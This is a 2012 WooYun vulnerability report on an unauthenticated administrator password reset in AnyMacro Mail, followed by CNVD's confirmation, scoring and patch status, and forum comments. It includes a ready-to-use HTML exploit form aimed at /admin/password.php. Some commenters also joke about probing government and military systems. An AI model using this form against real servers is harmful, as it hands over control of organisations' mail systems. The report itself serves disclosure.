当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06672

漏洞标题:AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业

相关厂商:AnyMacro Mail

漏洞作者: 松子

提交时间:2012-05-04 16:52

修复时间:2012-06-18 16:53

公开时间:2012-06-18 16:53

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-04: 细节已通知厂商并且等待厂商处理中
2012-05-07: 厂商已经确认,细节仅向厂商公开
2012-05-10: 细节向第三方安全合作伙伴开放
2012-07-01: 细节向核心白帽子及相关领域专家公开
2012-07-11: 细节向普通白帽子公开
2012-07-21: 细节向实习白帽子公开
2012-06-18: 细节向公众公开

简要描述:

对于设置密码的页面存在漏洞可以直接修改原密码,本人技术很菜找不到路径拿不到shell
用的地方还是挺多的。涉及政府、军工、收费运营商、大型企业怕和谐所以放出了。

详细说明:

漏洞证明:

EXP:

<html>
<head>
<title> </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="tpl/sysadm.css" type="text/css">
</head>
<body class=bgcolor3>
<br><br><br><br><br><br>
<table width=260 cellspacing=0 cellpadding=0 align=center valign=middle>
<tr height=11 class=bgcolor1>
<td width=11><img src=tpl/image/topleft.gif></td>
<td></td>
<td width=11><img src=tpl/image/topright.gif></td>
</tr>
<tr align=center class=bgcolor1>
<td width=11></td>
<td class=font13><p class=font14><br><b>设置邮件系统管理密码</b></p>
<form method=post action=网址/admin/password.php>
密  码: <input type=password name=password size=14><p>
重输密码: <input type=password name=password2 size=14><p>
<input type=submit value="修改密码">
</form>
</td>
<td width=11></td>
</tr>
<tr height=11 class=bgcolor1>
<td width=11><img src=tpl/image/bottomleft.gif></td>
<td></td>
<td width=11><img src=tpl/image/bottomright.gif></td>
</tr>
</table>
<br><br><br><br><br><br><br>
<table cellspacing=0 cellpadding=0 height=1 width=500 align=center><tr><td
class=bgcolor1></td></tr>
<tr><td align=center height=35 valign=bottom class=bgcolor3>Copyright &copy; 2002 Beijing
Anymacro Investment Ltd. All Rights Reserved.<br>
北京安宁投资有限公司 版权所有 </td></tr>
</table>
</body>

修复方案:

自己搞

版权声明:转载请注明来源 松子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-07 15:55

厂商回复:

CNVD确认漏洞情况并复现所述过程,将分两步同步进行处置:一是协调生产厂商(此前联系过两次),要求提供修复方案;二是向国务院某信息安全协调机构通报,联系受影响部门处置。
对漏洞评分如下:
CVSS:(AV:R/AC:L/Au:NR/C:P/A:C/I:P/B:N) score:8.97(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对可用性造成完全影响,对机密性、完整性造成部分影响。
技术难度系数:1.1(发现这个漏洞运气和实力都需要)
影响危害系数:2.0(较严重,涉及重要部门在线业务系统,存在信息泄露风险)
CNVD综合评分:8.97*1.1*2.0=19.734

最新状态:

2012-05-21:至5月20日,除上报国务院某信息安全协调机构处置外,邮件系统厂商——安宁公司提供了修复补丁,替换了存在漏洞的文件页面,同时对部分级别较高的部委、北京市地区的政府和高校网站进行了应急服务。建议相关用户联系厂商以便及时修复。


漏洞评价:

评论

  1. 2012-05-04 16:55 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    标题很霸气!

  2. 2012-05-04 17:01 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    根据搜索引擎记录,很早很早以前的《黑客X档案》2006年第2期,传说此系统可得shell

  3. 2012-05-04 17:02 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)

    @horseluke 貌似是更新了。上传的地址与WEB分离同时貌似找不到源码。说实话都是GOV惹不起啊

  4. 2012-05-04 17:04 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @松子 听到军工就知道一定很牛叉

  5. 2012-05-04 17:05 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)

    @Hxai11 低调。。

  6. 2012-05-04 17:06 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    名字好黄好暴力

  7. 2012-05-04 17:08 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @松子 霸气都已经外露了如何低调也?

  8. 2012-05-04 17:27 | cncert国家互联网应急中心(乌云厂商)

    @horseluke @Hxai11 @松子 有点霸气外露,这个与此前的一个漏洞 WooYun: 中华人民共和国商务部漏洞 不太一样。小心求证,谨慎处置。

  9. 2012-05-04 18:04 | 路人A ( 路人 | Rank:0 漏洞数:1 | 关注生活逻辑漏洞,不强求无谓重复活动; 顺...)

    @horseluke 详细到杂志哪一期,你才是真正牛人,

  10. 2012-05-04 18:09 | Litteryi ( 路人 | Rank:6 漏洞数:3 | 来自塞伯坦的天使。)

    GOV的的确惹不起,小心跨省哦!不过看到是军工。。。很好奇的有木有?反正我是有了!

  11. 2012-05-04 18:40 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    @路人A 搜索引擎给出的第一个答案.....

  12. 2012-05-04 18:40 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    @路人A 感兴趣的一定就记得牢咯

  13. 2012-05-04 19:16 | Say ( 路人 | Rank:17 漏洞数:4 | 谁又会鉴定谁正常?)

    = = 这个。。碉堡了

  14. 2012-05-04 20:18 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)

    @cncert国家互联网应急中心 这个和原来杂志和搜索引擎的不一样。虽然通过社工或许可以注册用户。但是搜索引擎的漏洞无法利用貌似是更新了。这个是通过POST直接修改密码然后进入后台。虽然可以继续做渗透,但是没做。涉及东西太多了。怕和谐。请谨慎处理。

  15. 2012-05-05 09:30 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    这个系统还真是奇葩。。。http://seclists.org/fulldisclosure/2012/May/3

  16. 2012-05-07 22:06 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    少见CNVD给20分

  17. 2012-05-07 22:08 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    @imlonghao 看影响范围我以为要爆掉rank的。。

  18. 2012-05-07 22:12 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @Valo洛洛 我记忆中有人爆过20分

  19. 2012-06-11 13:12 | SinCoder ( 路人 | Rank:5 漏洞数:1 )

    我汗 啊 我早没看到 。。。被修补了。。。

  20. 2012-06-11 18:48 | SinCoder ( 路人 | Rank:5 漏洞数:1 )

    今天下午挖了个洞 尼玛找不到可写的目录 我汗了。。。

  21. 2012-06-18 17:00 | king ( 路人 | Rank:15 漏洞数:2 | 喜爱安全,网络游戏安全应用漏洞挖掘)

    弱爆的洞洞,悲剧的安全意识

  22. 2012-06-18 23:19 | Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)

    g a的人老搞国外的军工,如果反倒被老外搞了,那就丢脸了(估计已经被搞不少了)家事还是关门解决最好